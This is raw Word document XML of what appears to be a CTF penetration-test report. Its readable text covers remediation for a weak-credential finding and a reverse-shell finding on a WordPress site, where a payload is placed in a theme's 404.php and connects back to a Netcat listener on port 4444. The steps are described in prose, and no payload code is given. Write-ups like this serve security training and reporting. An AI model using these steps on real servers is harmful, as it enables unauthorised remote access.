        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080"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65420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F9CCFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169FE1B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD01BF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7362388B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="555196DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F1B7861">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30286088">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB96813">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6411F7A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ACA41AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56495724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CE6D728">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C09F887">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2061069B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72DA5AE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68D6946E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DD3E491">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE14316">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338F8423">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A7B327E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>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successful login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1956961B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="508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5420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3060EADC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="508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5420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="749219FF">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD0D38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B051D03">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Compromise of a valid user account enables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>me</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> to execute commands, access user data, and continue privilege escalation activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570A6577">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AAC9228">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>High-Level Remediation Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEF72D9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="014A2402">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Enforce strong, unique passwords for all accounts  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AE327C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Avoid storing credentials in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plain-text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> within web-accessible locations  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DE40E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Implement multi-factor authentication where possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CD4CF6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E60C8C">
      <w:pPr>
        <w:ind w:firstLine="120" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3.3 Finding 3: Reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F24B6C">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768DD1A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  Risk Rating: HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E8BC91">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The vulnerability enables full remote access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B88ACB6">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Attackers can pivot, escalate privileges, and access sensitive files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3E73A0">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No authentication is required to exploit the flaw.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254D3205">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2617208A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CCC466">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1345F5A5">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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The target system hosts a WordPress-based site containing multiple weaknesses, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0114F307">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 publicly accessible WordPress admin panel with weak or guessable credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198B7A9D">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lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Outdated theme version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5376A4B5">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An upload or command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:noBreakHyphen/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>execution vector (e.g. misconfigured theme editor, or exposed file upload functionality).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2447D8">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The ability to execute arbitrary commands on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BACFEA">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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">By leveraging these weaknesses, an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>can upload or inject a payload that initiates a reverse shell, granting interactive access to the underlying operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107F9BE5">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 xml:space="preserve">Once connected, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gains the ability to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401F7599">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Browse directories and read files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEF2501">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Modify or delete system content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEBAA5B">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Execute system commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A8BE45">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Begin privilege escalation toward root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB9DBCD">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This represents a complete compromise of system confidentiality and integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4EA625">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CB2086">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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Examples of evidence typically observed in this CTF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4546511C">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olor w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>With this, URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://10.48.186.47/wp-content/themes/twentyfifteen/404.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7B9434">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Successful connection back to the attacker’s listener (via Netcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> , on port 4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770393B4">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Shell prompt showing the compromised machine’s hostname (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>daemon</w:t>
      </w:r>
      <w:r>
